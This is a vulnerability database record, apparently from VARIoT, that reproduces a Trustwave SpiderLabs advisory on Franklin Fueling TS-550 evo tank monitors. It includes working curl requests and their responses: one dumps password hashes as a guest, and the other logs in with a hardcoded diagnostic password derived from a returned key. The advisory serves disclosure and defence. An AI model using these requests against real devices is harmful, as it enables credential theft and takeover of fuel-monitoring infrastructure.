VAR-201401-0295
Vulnerability from variot - Updated: 2023-12-18 13:29

cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability.
Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.
Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version 2.4.0
Product description: A fuel management system with a programmable interface used for inventory and delivery management.
Finding 1: Insufficient Access Control
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7247
CWE: CWE-200
As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.
Request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi
Response
Finding 2: Hardcoded Technician Credentials
Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs
CVE: CVE-2013-7248
CWE: CWE-798
The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user with additional access, roleDiag, also exists. This user can access extra portions of the application, such as the command line interface, can enable and disable SSH, and can run SQL commands, all from the web interface. The CLI includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi), DES encrypted. This can be done in Ruby:
$ irb
1.9.3p374 :001 > "11111111".crypt("aa")
 => "aaDTlAa1fGGC."
Request
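curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi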
Response (note the ROLE)
The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.
Revision History:
04/16/13 - Vulnerability disclosed to vendor
12/18/13 - Fix released on a limited basis by vendor
01/03/14 - Advisory published

References
1. http://www.franklinfueling.com/evo/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0295",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.9,
"vendor": "franklinfueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.6,
"vendor": "franklinfueling",
"version": "2.3.1.7492"
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 1.0,
"vendor": "franklinfueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": null,
"trust": 0.8,
"vendor": "franklin fueling",
"version": null
},
{
"model": "ts-550 evo",
"scope": "eq",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.0.0.6833"
},
{
"model": "ts-550 evo",
"scope": "lt",
"trust": 0.8,
"vendor": "franklin fueling",
"version": "2.4.0"
},
{
"model": "ts-550 evo",
"scope": "ne",
"trust": 0.3,
"vendor": "franklinfueling",
"version": "2.4.0"
}
],
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.0.0.6833:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.3.1.7492:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:franklinfueling:ts-550_evo:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
"sources": [
{
"db": "BID",
"id": "64996"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.9
},
"cve": "CVE-2013-7247",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-7247",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-67249",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-7247",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-67249",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. \nSuccessfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. 
\n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n \u003cROLE_LIST\u003e\n \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin. Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface. The CLI interface includes the ability to run engineering\nand manufacturing commands. The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted. 
This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. 
Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "PACKETSTORM",
"id": "124873"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-67249",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7247",
"trust": 2.9
},
{
"db": "BID",
"id": "64996",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "56185",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-84525",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "31180",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-67249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "124873",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"id": "VAR-201401-0295",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:29:47.350000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "TS-550 evo",
"trust": 0.8,
"url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
},
{
"title": "ts550evo-2327608",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=47720"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7247"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/56185"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/64996"
},
{
"trust": 0.3,
"url": "http://www.franklinfueling.com/americas/en"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/evo/"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.franklinfueling.com/)"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-67249"
},
{
"db": "BID",
"id": "64996"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"db": "PACKETSTORM",
"id": "124873"
},
{
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2014-01-03T00:00:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-21T23:03:33",
"db": "PACKETSTORM",
"id": "124873"
},
{
"date": "2014-01-26T01:55:09.877000",
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"date": "2014-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-67249"
},
{
"date": "2015-03-19T08:08:00",
"db": "BID",
"id": "64996"
},
{
"date": "2014-01-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005928"
},
{
"date": "2014-01-27T15:57:24.630000",
"db": "NVD",
"id": "CVE-2013-7247"
},
{
"date": "2014-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Franklin Fueling Systems TS-550 evo Of firmware cgi-bin/tsaws.cgi Vulnerability in which important information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005928"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-415"
}
],
"trust": 0.6
}
}